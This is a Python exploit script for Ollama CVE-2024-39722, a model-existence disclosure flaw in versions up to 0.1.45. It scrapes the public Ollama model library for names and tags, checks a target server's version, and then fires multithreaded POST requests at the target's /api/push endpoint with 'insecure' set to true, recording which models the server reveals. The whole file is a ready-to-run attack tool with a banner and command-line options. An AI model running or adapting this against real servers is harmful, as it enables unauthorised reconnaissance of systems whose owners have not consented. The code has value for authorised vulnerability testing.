#!/usr/bin/env python3 # -*- coding: utf-8 -*- import os import sys import json import requests from lxml import etree import argparse from termcolor import colored import threading import queue from threading import Lock from urllib.parse import urlparse def print_banner(): """Print exploit banner""" banner = """ ┌─────────────────────────────────────────────────────┐ │ Ollama CVE-2024-39722 Model Existence Disclosure │ │ Exploit for Ollama versions <= 0.1.45 │ │ │ │ CVSS Score: 7.5 │ └─────────────────────────────────────────────────────┘ """ print(colored(banner, "cyan")) def get_html_content(url, cache_file="response.html"): """ Retrieves HTML content from URL or cache Args: url (str): URL to retrieve cache_file (str): Cache file name Returns: tuple: (etree object, status information) """ if os.path.exists(cache_file): print(colored(f"[INFO] File {cache_file} already exists!", "green")) return etree.parse(cache_file, etree.HTMLParser()), "cached" else: try: res = requests.get(url) if res.status_code == 200: print(colored("[INFO] Get html source success!", "green")) with open(cache_file, "w", encoding="utf-8") as f: f.write(res.text) print(colored(f"[INFO] Write html source to file {cache_file} success!", "green")) return etree.HTML(res.text), "fetched" else: print(colored(f"[ERROR] Get html source failed! Status code: {res.status_code}", "red")) return None, "error" except Exception as e: print(colored(f"[ERROR] Exception occurred: {str(e)}", "red")) return None, "error" def extract_model_links(html, base_url): """ Extracts model links from HTML Args: html: etree HTML object base_url (str): Base URL Returns: list: List of model information """ links = html.xpath('//*[@id="repo"]/ul/li') infos = [] for i in range(len(links)): url = links[i].xpath('./a/@href')[0] name = url.split("/")[-1] tags = links[i].xpath('./a/div[2]/div/span[@x-test-size]/text()') infos.append({ "name": name, "url": base_url + url, "tags": tags }) return infos def crawl_ollama_models(url="https://ollama.com/library", base_url="https://ollama.com", cache_file="response.html", output_file="links.json"): """ Crawls Ollama model library Args: url (str): Model library URL base_url (str): Base URL cache_file (str): HTML cache file output_file (str): Output JSON file Returns: list: List of model information """ print(colored("[*] Crawling Ollama models...", "yellow")) html, status = get_html_content(url, cache_file) if status == "error": return [] infos = extract_model_links(html, base_url) for i, info in enumerate(infos): print(colored(f"[INFO] Get link {i+1}: {info}", "green")) print(colored(f"[INFO] Get all {len(infos)} links success!", "green")) # save links to json file with open(output_file, "w", encoding="utf-8") as f: json.dump(infos, f, ensure_ascii=False, indent=4) print(colored(f"[+] Models saved to {output_file}", "green")) return infos def format_url(url): """ Ensure URL is properly formatted (no trailing slashes) Args: url (str): URL to format Returns: str: Properly formatted URL """ # Ensure URL starts with http/https if not url.startswith('http'): url = 'http://' + url # Remove trailing slash if present if url.endswith('/'): url = url[:-1] return url def check_ollama_version(base_url): """ Check Ollama version to determine if it's vulnerable to CVE-2024-39722 Args: base_url (str): Base URL of Ollama server Returns: tuple: (is_vulnerable, version_str or None, error_message or None) """ try: # Format URL and construct version endpoint URL base_url = format_url(base_url) version_url = f"{base_url}/api/version" # Send request to version endpoint response = requests.get(version_url, timeout=5) if response.status_code == 200: # Parse version from response data = response.json() if "version" in data: version = data["version"] # Check if version is vulnerable (≤ 0.1.45) is_vulnerable = is_version_vulnerable(version) if is_vulnerable: return True, version, None else: return False, version, f"Ollama version {version} is not vulnerable to CVE-2024-39722 (requires version ≤ 0.1.45)" else: return False, None, "Version information not found in response" else: return False, None, f"Failed to get version, server returned status code: {response.status_code}" except requests.exceptions.RequestException as e: return False, None, f"Connection error: {str(e)}" except Exception as e: return False, None, f"Error checking Ollama version: {str(e)}" def is_version_vulnerable(version): """ Check if the given version is vulnerable to CVE-2024-39722 (≤ 0.1.45) Args: version (str): Version string (e.g., "0.1.44") Returns: bool: True if version is vulnerable, False otherwise """ try: # Parse version components components = version.split('.') major, minor, patch = map(int, components) # Check if version is <= 0.1.45 if major == 0 and minor == 1 and patch <= 45: return True elif major == 0 and minor < 1: return True else: return False except (ValueError, IndexError): # If version parsing fails, assume vulnerable to be safe print(colored(f"[WARNING] Could not parse version string: {version}", "yellow")) return True def send_api_request(url, payload): """ Sends API request to Ollama server Args: url (str): Target URL payload (dict): JSON payload Returns: str: Response content or None (if error) """ # Send POST request try: response = requests.post(url, json=payload) return response.text except requests.exceptions.RequestException as e: print(colored(f"[ERROR] Request exception: {e}", "red")) return None def worker(task_queue, url, leaked_models, print_lock): """ Worker function for threading Args: task_queue: Queue with payloads to process url: Target URL leaked_models: Shared list to store leaked models print_lock: Lock for thread-safe printing """ while not task_queue.empty(): try: i, payload = task_queue.get(block=False) with print_lock: print(colored(f"[*] Testing payload {i+1}: {payload['name']}", "yellow")) result = send_api_request(url=url, payload=payload) if result and "error" not in result: with print_lock: print(colored(f"[+] Ollama server model leak: {payload['name']}", "green")) print(colored(f"[+] Payload: '{json.dumps(payload)}'", "green")) leaked_models.append(payload['name']) task_queue.task_done() except queue.Empty: break def exploit_ollama_server(url="http://localhost:11434/api/push", links_file="links.json", thread_count=10): """ Exploits Ollama server by attempting to leak models using payloads from a JSON file Args: url (str): The URL of the Ollama server API links_file (str): Path to the JSON file containing links data thread_count (int): Number of threads to use for payload testing Returns: list: List of leaked model names """ print(colored("[*] Starting Ollama server exploitation...", "yellow")) # Format URL properly url = format_url(url) # Get base URL for version checking parsed_url = urlparse(url) base_url = f"{parsed_url.scheme}://{parsed_url.netloc}" # Check if server is vulnerable based on version is_vulnerable, version, error = check_ollama_version(base_url) if not is_vulnerable: if version: print(colored(f"[!] Target server is not vulnerable: Ollama v{version}", "yellow")) if error: print(colored(f"[!] {error}", "yellow")) return [] else: if version: print(colored(f"[+] Target server is vulnerable: Ollama v{version} (≤ 0.1.45)", "green")) try: with open(links_file, 'r') as f: data = json.load(f) print(colored(f"[INFO] Read {len(data)} links from file {f.name} success!", "green")) except Exception as e: print(colored(f"[ERROR] Failed to read links file: {str(e)}", "red")) return [] payloads = [] leaked_models = [] print_lock = Lock() # Create payloads from model data for i in range(len(data)): for j in range(len(data[i]['tags'])): payloads.append({ "name": data[i]['name']+":"+data[i]['tags'][j], "insecure": True, "stream": True, }) print(colored(f"[INFO] Generated {len(payloads)} payloads for testing", "green")) print(colored(f"[INFO] Using {thread_count} threads for payload testing", "green")) # Create a queue and add payloads with their indices task_queue = queue.Queue() for i, payload in enumerate(payloads): task_queue.put((i, payload)) # Create and start worker threads threads = [] for _ in range(min(thread_count, len(payloads))): thread = threading.Thread( target=worker, args=(task_queue, url, leaked_models, print_lock) ) thread.daemon = True thread.start() threads.append(thread) # Wait for all threads to complete for thread in threads: thread.join() if leaked_models: print(colored(f"[+] Successfully leaked {len(leaked_models)} models", "green")) else: print(colored("[-] No models leaked", "yellow")) return leaked_models def main(): """Main function""" parser = argparse.ArgumentParser(description="Ollama CVE-2024-39722 Exploit Tool") parser.add_argument("-u", "--url", help="Target Ollama server URL") parser.add_argument("-c", "--crawl", action="store_true", help="Crawl Ollama models library") parser.add_argument("-o", "--output", default="results.json", help="Output file for results (default: results.json)") parser.add_argument("-t", "--threads", type=int, default=10, help="Number of threads to use (default: 10)") parser.add_argument("-v", "--version-check", action="store_true", help="Only check if target is vulnerable based on version") args = parser.parse_args() print_banner() # No arguments provided, show help if len(sys.argv) == 1: parser.print_help() sys.exit(1) results = {} # Crawl Ollama models if args.crawl: results["crawled_models"] = crawl_ollama_models() # Check version only if args.version_check and args.url: url = format_url(args.url) is_vulnerable, version, error = check_ollama_version(url) if is_vulnerable: print(colored(f"[+] Target is vulnerable: Ollama v{version} (≤ 0.1.45)", "green")) else: if version: print(colored(f"[-] Target is not vulnerable: Ollama v{version}", "red")) if error: print(colored(f"[!] {error}", "yellow")) return # Exploit Ollama server if args.url: url = format_url(args.url) # Make sure URL ends with /api/push for exploitation if not url.endswith("/api/push"): url = f"{url}/api/push" results["leaked_models"] = exploit_ollama_server(url=url, thread_count=args.threads) # Save results to file if results: with open(args.output, "w") as f: json.dump(results, f, indent=4) print(colored(f"[+] Results saved to {args.output}", "green")) if __name__ == "__main__": main()